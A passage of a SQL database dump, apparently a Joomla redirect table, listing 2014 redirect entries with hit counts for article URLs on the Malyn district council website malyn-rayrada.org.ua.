00:00:00',301),(9632,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:05:27','0000-00-00 00:00:00',301),(9633,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=en','','','',4,0,'2014-11-03 13:05:30','0000-00-00 00:00:00',301),(9634,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=ru','','','',1,0,'2014-11-03 13:05:32','0000-00-00 00:00:00',301),(9635,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=ru','','','',2,0,'2014-11-03 13:05:35','0000-00-00 00:00:00',301),(9636,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=ru','','','',1,0,'2014-11-03 13:05:39','0000-00-00 00:00:00',301),(9637,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=en','','','',5,0,'2014-11-03 13:05:41','0000-00-00 00:00:00',301),(9638,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=ru','','','',1,0,'2014-11-03 13:05:43','0000-00-00 00:00:00',301),(9639,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=en','','','',2,0,'2014-11-03 13:05:46','0000-00-00 00:00:00',301),(9640,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:05:48','0000-00-00 00:00:00',301),(9641,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=ru','','','',1,0,'2014-11-03 13:05:53','0000-00-00 00:00:00',301),(9642,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=en','','','',1,0,'2014-11-03 13:05:55','0000-00-00 00:00:00',301),(9643,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=ru','','','',1,0,'2014-11-03 13:05:58','0000-00-00 00:00:00',301),(9644,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=en','','','',1,0,'2014-11-03 13:06:00','0000-00-00 00:00:00',301),(9645,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=ru','','','',1,0,'2014-11-03 13:06:02','0000-00-00 00:00:00',301),(9646,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&lang=ru','','','',1,0,'2014-11-03 13:06:07','0000-00-00 00:00:00',301),(9647,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=en','','','',1,0,'2014-11-03 13:06:09','0000-00-00 00:00:00',301),(9648,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=ru','','','',1,0,'2014-11-03 13:06:12','0000-00-00 00:00:00',301),(9649,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11&lang=en','','','',1,0,'2014-11-03 13:06:14','0000-00-00 00:00:00',301),(9650,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:06:19','0000-00-00 00:00:00',301),(9651,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=en','','','',1,0,'2014-11-03 13:06:21','0000-00-00 00:00:00',301),(9652,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=ru','','','',2,0,'2014-11-03 13:06:26','0000-00-00 00:00:00',301),(9653,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&catid=56&Itemid=97&lang=ru','','','',3,0,'2014-11-03 13:07:04','0000-00-00 00:00:00',301),(9654,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&catid=56&Itemid=97&lang=ru','','','',2,0,'2014-11-03 13:07:08','0000-00-00 00:00:00',301),(9655,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=56&Itemid=97&lang=ru','','','',1,0,'2014-11-03 13:07:11','0000-00-00 00:00:00',301),(9656,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=56&Itemid=97&lang=ru','','','',1,0,'2014-11-03 13:07:14','0000-00-00 00:00:00',301),(9657,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=56&Itemid=97&lang=ru','','','',1,0,'2014-11-03 13:07:17','0000-00-00 00:00:00',301),(9658,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=ru','','','',1,0,'2014-11-03 13:07:20','0000-00-00 00:00:00',301),(9659,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&catid=56&Itemid=97&lang=ru','','','',1,0,'2014-11-03 13:07:35','0000-00-00 00:00:00',301),(9660,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=56&Itemid=97&lang=ru','','','',2,0,'2014-11-03 13:07:42','0000-00-00 00:00:00',301),(9661,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=56&Itemid=97&lang=ru','','','',2,0,'2014-11-03 13:07:44','0000-00-00 00:00:00',301),(9662,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&lang=ru','','','',1,0,'2014-11-03 13:08:05','0000-00-00 00:00:00',301),(9663,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=ru','','','',2,0,'2014-11-03 13:08:07','0000-00-00 00:00:00',301),(9664,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1211:-2014-&catid=56&Itemid=97&lang=ru','','','',1,0,'2014-11-03 13:08:14','0000-00-00 00:00:00',301),(9665,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=ru','','','',1,0,'2014-11-03 13:08:16','0000-00-00 00:00:00',301),(9666,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=ru','','','',5,0,'2014-11-03 13:08:23','0000-00-00 00:00:00',301),(9667,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=en','','','',1,0,'2014-11-03 13:08:29','0000-00-00 00:00:00',301),(9668,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=ru','','','',2,0,'2014-11-03 13:08:32','0000-00-00 00:00:00',301),(9669,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=en','','','',1,0,'2014-11-03 13:08:39','0000-00-00 00:00:00',301),(9670,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=en','','','',2,0,'2014-11-03 13:08:43','0000-00-00 00:00:00',301),(9671,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=ru','','','',5,0,'2014-11-03 13:08:56','0000-00-00 00:00:00',301),(9672,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&lang=en','','','',1,0,'2014-11-03 13:08:59','0000-00-00 00:00:00',301),(9673,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15&lang=en','','','',1,0,'2014-11-03 13:09:05','0000-00-00 00:00:00',301),(9674,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15&lang=ru','','','',1,0,'2014-11-03 13:09:07','0000-00-00 00:00:00',301),(9675,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=en','','','',1,0,'2014-11-03 13:09:09','0000-00-00 00:00:00',301),(9676,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=en','','','',1,0,'2014-11-03 13:09:15','0000-00-00 00:00:00',301),(9677,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:09:17','0000-00-00 00:00:00',301),(9678,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:09:22','0000-00-00 00:00:00',301),(9679,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=en','','','',1,0,'2014-11-03 13:09:25','0000-00-00 00:00:00',301),(9680,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=ru','','','',1,0,'2014-11-03 13:09:28','0000-00-00 00:00:00',301),(9681,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=en','','','',2,0,'2014-11-03 13:09:31','0000-00-00 00:00:00',301),(9682,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:09:33','0000-00-00 00:00:00',301),(9683,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=ru','','','',1,0,'2014-11-03 13:09:38','0000-00-00 00:00:00',301),(9684,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=ru','','','',1,0,'2014-11-03 13:09:43','0000-00-00 00:00:00',301),(9685,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=en','','','',1,0,'2014-11-03 13:09:51','0000-00-00 00:00:00',301),(9686,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=ru','','','',4,0,'2014-11-03 13:09:53','0000-00-00 00:00:00',301),(9687,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=en','','','',1,0,'2014-11-03 13:09:56','0000-00-00 00:00:00',301),(9688,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=ru','','','',5,0,'2014-11-03 13:09:58','0000-00-00 00:00:00',301),(9689,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=en','','','',1,0,'2014-11-03 13:10:02','0000-00-00 00:00:00',301),(9690,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=ru','','','',1,0,'2014-11-03 13:10:04','0000-00-00 00:00:00',301),(9691,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=en','','','',1,0,'2014-11-03 13:10:11','0000-00-00 00:00:00',301),(9692,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=ru','','','',5,0,'2014-11-03 13:10:13','0000-00-00 00:00:00',301),(9693,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=ru','','','',1,0,'2014-11-03 13:10:17','0000-00-00 00:00:00',301),(9694,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=en','','','',1,0,'2014-11-03 13:10:20','0000-00-00 00:00:00',301),(9695,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=en','','','',1,0,'2014-11-03 13:10:27','0000-00-00 00:00:00',301),(9696,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:10:34','0000-00-00 00:00:00',301),(9697,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=57&Itemid=98&lang=en','','','',1,0,'2014-11-03 13:10:36','0000-00-00 00:00:00',301),(9698,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=57&Itemid=98&lang=ru','','','',1,0,'2014-11-03 13:10:39','0000-00-00 00:00:00',301),(9699,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=57&Itemid=98&lang=en','','','',6,0,'2014-11-03 13:10:42','0000-00-00 00:00:00',301),(9700,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=57&Itemid=98&lang=ru','','','',1,0,'2014-11-03 13:10:44','0000-00-00 00:00:00',301),(9701,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15&lang=ru','','','',4,0,'2014-11-03 13:10:55','0000-00-00 00:00:00',301),(9702,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=57&Itemid=98&lang=ru','','','',1,0,'2014-11-03 13:11:06','0000-00-00 00:00:00',301),(9703,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=ru','','','',1,0,'2014-11-03 13:11:12','0000-00-00 00:00:00',301),(9704,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=ru','','','',1,0,'2014-11-03 13:11:14','0000-00-00 00:00:00',301),(9705,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=57&Itemid=98&lang=ru','','','',1,0,'2014-11-03 13:11:19','0000-00-00 00:00:00',301),(9706,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=en','','','',1,0,'2014-11-03 13:11:22','0000-00-00 00:00:00',301),(9707,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=ru','','','',1,0,'2014-11-03 13:11:24','0000-00-00 00:00:00',301),(9708,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=57&Itemid=98&lang=ru','','','',1,0,'2014-11-03 13:11:26','0000-00-00 00:00:00',301),(9709,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=ru','','','',1,0,'2014-11-03 13:11:29','0000-00-00 00:00:00',301),(9710,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=ru','','','',1,0,'2014-11-03 13:11:38','0000-00-00 00:00:00',301),(9711,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=ru','','','',2,0,'2014-11-03 13:11:41','0000-00-00 00:00:00',301),(9712,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=ru','','','',1,0,'2014-11-03 13:11:43','0000-00-00 00:00:00',301),(9713,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=ru','','','',1,0,'2014-11-03 13:11:48','0000-00-00 00:00:00',301),(9714,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:-l-r&catid=57&Itemid=98&lang=ru','','','',1,0,'2014-11-03 13:11:53','0000-00-00 00:00:00',301),(9715,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:-3110&catid=57&Itemid=98&lang=ru','','','',2,0,'2014-11-03 13:11:58','0000-00-00 00:00:00',301),(9716,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&catid=57&Itemid=98&lang=en','','','',1,0,'2014-11-03 13:12:06','0000-00-00 00:00:00',301),(9717,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=57&Itemid=98&lang=en','','','',1,0,'2014-11-03 13:12:17','0000-00-00 00:00:00',301),(9718,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=57&Itemid=98&lang=ru','','','',1,0,'2014-11-03 13:12:19','0000-00-00 00:00:00',301),(9719,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=57&Itemid=98&lang=ru','','','',1,0,'2014-11-03 13:12:29','0000-00-00 00:00:00',301),(9720,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=ru','','','',1,0,'2014-11-03 13:12:31','0000-00-00 00:00:00',301),(9721,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=en','','','',1,0,'2014-11-03 13:12:35','0000-00-00 00:00:00',301),(9722,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=ru','','','',1,0,'2014-11-03 13:12:38','0000-00-00 00:00:00',301),(9723,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:12:53','0000-00-00 00:00:00',301),(9724,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=ru','','','',1,0,'2014-11-03 13:12:55','0000-00-00 00:00:00',301),(9725,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=ru','','','',1,0,'2014-11-03 13:13:03','0000-00-00 00:00:00',301),(9726,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=en','','','',5,0,'2014-11-03 13:13:06','0000-00-00 00:00:00',301),(9727,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=ru','','','',1,0,'2014-11-03 13:13:08','0000-00-00 00:00:00',301),(9728,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:13:13','0000-00-00 00:00:00',301),(9729,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=en','','','',5,0,'2014-11-03 13:13:16','0000-00-00 00:00:00',301),(9730,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=ru','','','',1,0,'2014-11-03 13:13:18','0000-00-00 00:00:00',301),(9731,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=en','','','',4,0,'2014-11-03 13:13:20','0000-00-00 00:00:00',301),(9732,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=ru','','','',1,0,'2014-11-03 13:13:22','0000-00-00 00:00:00',301),(9733,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=ru','','','',4,0,'2014-11-03 13:13:31','0000-00-00 00:00:00',301),(9734,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=en','','','',4,0,'2014-11-03 13:13:34','0000-00-00 00:00:00',301),(9735,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=ru','','','',1,0,'2014-11-03 13:13:36','0000-00-00 00:00:00',301),(9736,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:13:46','0000-00-00 00:00:00',301),(9737,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=ru','','','',1,0,'2014-11-03 13:13:52','0000-00-00 00:00:00',301),(9738,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=en','','','',4,0,'2014-11-03 13:13:54','0000-00-00 00:00:00',301),(9739,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=en','','','',1,0,'2014-11-03 13:13:58','0000-00-00 00:00:00',301),(9740,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:14:05','0000-00-00 00:00:00',301),(9741,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=en','','','',1,0,'2014-11-03 13:14:13','0000-00-00 00:00:00',301),(9742,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=ru','','','',1,0,'2014-11-03 13:14:15','0000-00-00 00:00:00',301),(9743,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=59&Itemid=107&lang=en','','','',1,0,'2014-11-03 13:14:21','0000-00-00 00:00:00',301),(9744,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&lang=en','','','',4,0,'2014-11-03 13:14:30','0000-00-00 00:00:00',301),(9745,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&lang=ru','','','',1,0,'2014-11-03 13:14:32','0000-00-00 00:00:00',301),(9746,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=en','','','',1,0,'2014-11-03 13:14:40','0000-00-00 00:00:00',301),(9747,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=ru','','','',1,0,'2014-11-03 13:14:42','0000-00-00 00:00:00',301),(9748,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=ru','','','',1,0,'2014-11-03 13:14:48','0000-00-00 00:00:00',301),(9749,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=ru','','','',1,0,'2014-11-03 13:14:52','0000-00-00 00:00:00',301),(9750,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=ru','','','',2,0,'2014-11-03 13:14:54','0000-00-00 00:00:00',301),(9751,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-03 13:15:06','0000-00-00 00:00:00',301),(9752,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=ru','','','',1,0,'2014-11-03 13:15:12','0000-00-00 00:00:00',301),(9753,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-11-03 13:15:14','0000-00-00 00:00:00',301),(9754,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-03 13:15:16','0000-00-00 00:00:00',301),(9755,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=ru','','','',1,0,'2014-11-03 13:15:24','0000-00-00 00:00:00',301),(9756,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-11-03 13:15:26','0000-00-00 00:00:00',301),(9757,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-03 13:15:29','0000-00-00 00:00:00',301),(9758,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=ru','','','',1,0,'2014-11-03 13:15:33','0000-00-00 00:00:00',301),(9759,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-11-03 13:15:36','0000-00-00 00:00:00',301),(9760,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-03 13:15:38','0000-00-00 00:00:00',301),(9761,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:15:43','0000-00-00 00:00:00',301),(9762,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-11-03 13:15:46','0000-00-00 00:00:00',301),(9763,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-03 13:15:48','0000-00-00 00:00:00',301),(9764,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&lang=en','','','',4,0,'2014-11-03 13:15:52','0000-00-00 00:00:00',301),(9765,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&lang=ru','','','',1,0,'2014-11-03 13:15:55','0000-00-00 00:00:00',301),(9766,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-11-03 13:15:57','0000-00-00 00:00:00',301),(9767,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-03 13:15:59','0000-00-00 00:00:00',301),(9768,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&lang=ru','','','',1,0,'2014-11-03 13:16:01','0000-00-00 00:00:00',301),(9769,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-03 13:16:03','0000-00-00 00:00:00',301),(9770,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&lang=ru','','','',1,0,'2014-11-03 13:16:06','0000-00-00 00:00:00',301),(9771,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15&lang=ru&Itemid=','','','',3,0,'2014-11-03 13:26:45','0000-00-00 00:00:00',301),(9772,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=ru','','','',4,0,'2014-11-03 13:38:25','0000-00-00 00:00:00',301),(9773,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=ru&Itemid=','','','',4,0,'2014-11-03 13:46:13','0000-00-00 00:00:00',301),(9774,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1216:-q-q&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-03 13:48:11','0000-00-00 00:00:00',301),(9775,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=uk','','','',4,0,'2014-11-03 13:49:20','0000-00-00 00:00:00',301),(9776,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=ru&Itemid=','','','',5,0,'2014-11-03 14:04:47','0000-00-00 00:00:00',301),(9777,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=935:----------14-112012332-l------r&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-03 14:28:36','0000-00-00 00:00:00',301),(9778,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=942:-19-6-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-03 14:47:55','0000-00-00 00:00:00',301),(9779,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-03 15:20:33','0000-00-00 00:00:00',301),(9780,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-11-03 15:27:31','0000-00-00 